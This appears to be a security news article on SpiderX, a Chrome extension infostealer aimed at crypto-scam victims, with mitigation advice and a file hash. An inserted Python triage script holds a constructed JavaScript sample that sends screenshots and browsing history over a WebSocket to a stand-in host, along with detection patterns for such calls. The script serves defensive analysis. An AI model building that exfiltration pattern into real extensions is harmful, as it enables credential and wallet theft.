A crude malicious Chrome extension for stealing personal data and crypto can slip through malware detection systems, despite its simplicity. This significant leak provides unique insights into the effectiveness of malicious campaigns and the limitations of current spam and malware detection systems.
The exposed Elasticsearch instance, a data storage and search tool used for campaign logging, contains critical operational data and personal information harvested from hundreds of victims. The malicious actor, believed to be based in Israel, defrauds hundreds of people per month. The criminal scheme was exposed after the perpetrator left the Elasticsearch instance open.
The Cybernews research team discovered the instance and uncovered the malicious operation behind it.
The threat actor developed a simple information stealer in the form of a browser extension on Chrome Web Store called SpiderX. Despite obvious malicious intent, it has not yet been detected by antivirus software.
SpiderX is capable of gathering plaintext login information, taking screenshots, and tracking browsing history. The threat actor created an infrastructure containing dozens of malicious internet addresses and WhatsApp accounts to lure victims into downloading the extension.
“Despite amateurish execution and carelessness, the threat actor is sending tens of thousands of spam emails per month and has an infection rate of 1%. At the time of discovery, there were over 500 infected victims, and the campaign is still ongoing,” Cybernews researchers said.
However, it seems like the developer was not careful and even exposed their own personal details, which were used to test the malicious infrastructure, leading to a person in Israel.
The social engineering campaign targets crypto users
The SpiderX campaign masquerades as various companies or even institutions specializing in crypto asset recovery. The goal of the financially motivated threat actor is to drain the victims’ cryptocurrency wallets.
The scheme starts by sending spam from domains impersonating cryptocurrency recovery agencies, trading platforms, wallets, or even the Financial Conduct Authority, using sites like claimyourrefund[.]net, fca-recovery[.]org, spiderx[.]co, and many others.
“The spam messages claim that they can help you recover stolen or lost crypto assets or unfreeze frozen accounts associated with unregistered crypto trading services. They often target victims who already have suffered in previous crypto scams and are likely to pay even more,” Cybernews researchers said.
The subject lines of spam emails attempted to create a sense of urgency or a personal touch. Examples include 'Urgent: Follow-up on Your Refund Procedure' and 'Martin from AI-B Security.'
If the victim replies to the attackers, showing interest in these services, the threat actor directs them to download malware to proceed with the ‘recovery’ process. SpiderX pretends to be a cryptocurrency wallet.
Some variations of the spam messages and websites used in the malicious campaign directed users to contact the threat actor via WhatsApp, while others directed them to download Chrome extensions and install them manually. Not all malicious browser extensions were published in the Chrome extension store.
At the time of the discovery, the malicious campaign had been running for 45 days, and spam emails had reached over 52 thousand unique recipients. It was still active, continuously spreading more spam emails and infecting new victims.
The SpiderX infostealer has no obfuscation
Once a malicious Chrome extension is installed, it takes screenshots of the victim’s screen, gathers plaintext login information from forms on various websites, and exfiltrates the browsing history.
In the description on Chrome Web Store, the threat actor declares that the extension collects browsing history and data “to analyze it for malicious code.” The extension has zero reviews and the declared developer is fake.
In the background, the extension establishes a connection to a WebSocket server (wssService) at spiderx[.]co/ws.
Unlike traditional one-way HTTP requests, this enables real-time bidirectional communication between the web browser and the server. The code interacts with Chrome tabs through the chrome.tabs API, takes screenshots every second, and sends the collected screenshots, browsing history, and form data to the server.
The malware also listens for various Chrome events related to tabs, such as when they are activated, updated, or removed. It is also capable of injecting scripts into web pages.
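The behaviours listed above (broad tab and history permissions, a periodic screenshot loop, script injection into pages, and a WebSocket channel to a remote server) are exactly what a static triage of an unpacked extension can surface without running it. The following script is an added example, not code from the article or from the researchers; the manifest and background script it inspects are constructed samples modelled on the described behaviour, not the real SpiderX source.

```python
import json
import re

# Constructed sample: an unpacked extension's manifest.json and background
# script that mirror the behaviours described above (not the real SpiderX code).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Wallet Helper",
    "permissions": ["tabs", "history", "scripting", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background.js"},
})
SAMPLE_SCRIPT = """
const ws = new WebSocket("wss://example.invalid/ws");
setInterval(() => chrome.tabs.captureVisibleTab(null, {}, img => ws.send(img)), 1000);
chrome.history.search({text: ""}, items => ws.send(JSON.stringify(items)));
chrome.tabs.onUpdated.addListener((id) => chrome.scripting.executeScript({target: {tabId: id}, files: ["grab.js"]}));
"""

# Permissions and API calls that, in combination, indicate data harvesting.
RISKY_PERMISSIONS = {"tabs", "history", "scripting", "webNavigation", "cookies"}
RISKY_CALLS = {
    "screenshot": r"chrome\.tabs\.captureVisibleTab",
    "history_read": r"chrome\.history\.",
    "script_injection": r"chrome\.scripting\.executeScript|chrome\.tabs\.executeScript",
    "websocket_exfil": r"new\s+WebSocket\s*\(",
    "timed_loop": r"setInterval\s*\(",
}

def triage(manifest_text, script_text):
    """Score an extension from its manifest and main script; returns findings."""
    manifest = json.loads(manifest_text)
    perms = set(manifest.get("permissions", []))
    # MV3 keeps host patterns in host_permissions; MV2 mixed them into permissions.
    hosts = manifest.get("host_permissions", []) + [p for p in perms if "://" in p or p == "<all_urls>"]
    findings = {
        "risky_permissions": sorted(perms & RISKY_PERMISSIONS),
        "all_urls": any(h in ("<all_urls>", "*://*/*") for h in hosts),
        "calls": sorted(name for name, pat in RISKY_CALLS.items() if re.search(pat, script_text)),
    }
    # Simple additive score; the threshold is a heuristic chosen for this example.
    score = len(findings["risky_permissions"]) + len(findings["calls"]) + (2 if findings["all_urls"] else 0)
    findings["score"] = score
    findings["verdict"] = "review" if score >= 5 else "low"
    return findings

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_SCRIPT), indent=2))
```

The same function can be pointed at a real unpacked extension by reading its manifest.json and the script named under `background` from disk.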
The malicious actor used “Umbraco,” a popular open-source content management system, for Command and Control (C2) and exfiltration.
“If SpiderX has been running for a while, no credentials stored on the affected machine should be trusted,” the researchers warn.
“Interestingly, none of the malware detection vendors available on VirusTotal detected the extension as malicious, even though, during static code analysis, it was clear that the application collects information from websites and sends it to a remote server. All its logic and used methods weren’t obfuscated,” Cybernews researchers said.
It wasn’t flagged as malicious by the Chrome Extension Store, either.
Further analysis revealed that the infrastructure for this campaign was spread out over multiple jurisdictions, mainly China, the US, and Europe. This is likely to complicate potential law enforcement investigations.
The infrastructure also heavily relied on legitimate Cloudflare infrastructure to hide the locations of most of the servers used in the campaign. The domains were also hosted on legitimate cloud providers.
Cybernews has already reported on how easy it is to craft a malicious Chrome extension and steal private information.
Poor operational security exposes the hacker
The malicious campaign was identified due to the lack of operational security measures and software misconfigurations.
“It appears that before launching the campaign, the threat actor set up and tested the infrastructure using their email, IP address, and other personal information,” our researchers said. “This data leads to a person in Israel.”
The Cybernews research team found a corresponding account on an “Umbraco” developers forum and social media accounts.
“Among the leaked emails, we discovered that the developer behind SpiderX communicated with other threat actors in an attempt to buy fake reviews for the malicious extension. Hundreds of appeal emails were also sent to Spamhaus, an organization that tracks spam and malware on the internet, which flagged some of their malicious domains,” the researchers said.
Mitigation requires changing all passwords
If your machine gets compromised with SpiderX malware, the Cybernews researchers recommend the following steps:
- Remove the malicious extension from the compromised system and ensure it’s not present on other machines with synced Chrome accounts.
- Terminate all the active sessions on important accounts from Google, Meta, and other service providers using their corresponding support pages.
- Using a secure system, change all of the passwords that were ever entered and saved on the machine, prioritizing the most sensitive accounts, such as financial accounts and crypto exchange accounts. Transfer any remaining cryptocurrency assets to a new wallet.
- Back up any important or sensitive files. Wipe any and all data from the compromised machine and reinstall the operating system.
- Evaluate any potential damages made via unauthorized asset transfers and seek support from relevant providers to check if any protections are available for reversing fraudulent transactions.
- Sign up for a credit monitoring service to see if your information was used to take out loans or create any new accounts for banks or cryptocurrency exchanges.
“The threat actor made multiple mistakes, and the malicious intents of the code couldn’t be more obvious. Yet, they still managed to compromise hundreds of people despite only sending a relatively small amount of spam emails. That could quickly be scaled up to thousands and even millions,” the researchers warned.
All the information accessed by the Cybernews research team was used solely for research purposes, and only anonymized samples were collected to analyze the scope of the malicious campaign.
Indicators of compromise
The hash of the malicious SpiderX extension:
441274c48b1fdb869c4a0ebee070562eff724827fdd128f033d12b16cd7d3f2f
Domains involved in the malicious campaign at the time of the investigation: